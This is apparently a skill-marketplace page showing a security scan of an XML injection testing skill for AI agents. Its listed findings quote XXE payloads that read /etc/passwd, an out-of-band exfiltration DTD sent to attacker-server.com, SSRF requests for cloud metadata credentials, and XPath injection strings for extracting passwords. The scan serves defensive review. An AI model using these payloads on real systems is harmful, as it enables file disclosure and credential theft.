Skip to main content

testing-for-xml-injection-vulnerabilities

Tests web applications for XML injection vulnerabilities, including XXE and XPath injection, to enhance security and prevent data exposure.

Install this skill

or
0/100

Security score

The testing-for-xml-injection-vulnerabilities skill was audited on Jun 5, 2026 and we found 27 security issues across 4 threat categories, including 1 critical. Review the findings below before installing.

Categories Tested

Security Issues

medium line 56

Curl to non-GitHub URL

SourceSKILL.md
56curl -s http://target.com/service?wsdl
medium line 59

Curl to non-GitHub URL

SourceSKILL.md
59curl -X POST http://target.com/api/data \
medium line 142

Curl to non-GitHub URL

SourceSKILL.md
142curl "http://target.com/search?query=' or '1'='1"
medium line 145

Curl to non-GitHub URL

SourceSKILL.md
145curl -X POST http://target.com/login \
medium line 149

Curl to non-GitHub URL

SourceSKILL.md
149curl "http://target.com/search?query=' or 1=1 or ''='"
medium line 152

Curl to non-GitHub URL

SourceSKILL.md
152curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"
medium line 153

Curl to non-GitHub URL

SourceSKILL.md
153curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"
high line 72

Access to /etc/passwd

SourceSKILL.md
72<!ENTITY xxe SYSTEM "file:///etc/passwd">
high line 86

Access to /etc/passwd

SourceSKILL.md
86<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
critical line 201

Access to /etc/passwd

SourceSKILL.md
2011. **File Disclosure** — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields
high line 218

Access to /etc/passwd

SourceSKILL.md
218| 1 | XXE File Read | POST /api/import | SYSTEM "file:///etc/passwd" | Local File Disclosure |
high line 201

Prompting for password/secret input

SourceSKILL.md
2011. **File Disclosure** — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields
low line 56

External URL reference

SourceSKILL.md
56curl -s http://target.com/service?wsdl
low line 59

External URL reference

SourceSKILL.md
59curl -X POST http://target.com/api/data \
low line 96

External URL reference

SourceSKILL.md
96<!ENTITY % xxe SYSTEM "http://attacker-server.com/xxe.dtd">
low line 103

External URL reference

SourceSKILL.md
103<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker-server.com/?data=%file;'>">
low line 110

External URL reference

SourceSKILL.md
110<!ENTITY xxe SYSTEM "http://xxe-test.burpcollaborator.net">
low line 120

External URL reference

SourceSKILL.md
120<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
low line 127

External URL reference

SourceSKILL.md
127<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
low line 134

External URL reference

SourceSKILL.md
134<!ENTITY xxe SYSTEM "http://internal-server:8080/">
low line 142

External URL reference

SourceSKILL.md
142curl "http://target.com/search?query=' or '1'='1"
low line 145

External URL reference

SourceSKILL.md
145curl -X POST http://target.com/login \
low line 149

External URL reference

SourceSKILL.md
149curl "http://target.com/search?query=' or 1=1 or ''='"
low line 152

External URL reference

SourceSKILL.md
152curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"
low line 153

External URL reference

SourceSKILL.md
153curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"
low line 211

External URL reference

SourceSKILL.md
211- **Target**: http://target.com/api/xml-endpoint
low line 220

External URL reference

SourceSKILL.md
220| 3 | SSRF via XXE | POST /api/parse | SYSTEM "http://169.254.169.254/" | Cloud Credential Theft |
Scanned on Jun 5, 2026
View Security Dashboard
Installation guide →
GitHub Stars 8
Rate this skill
Categorydevelopment
UpdatedJune 15, 2026
openclawtestingsecurity-engineerqa-engineerbackend-developerdevelopment
26zl/cybersec-toolkit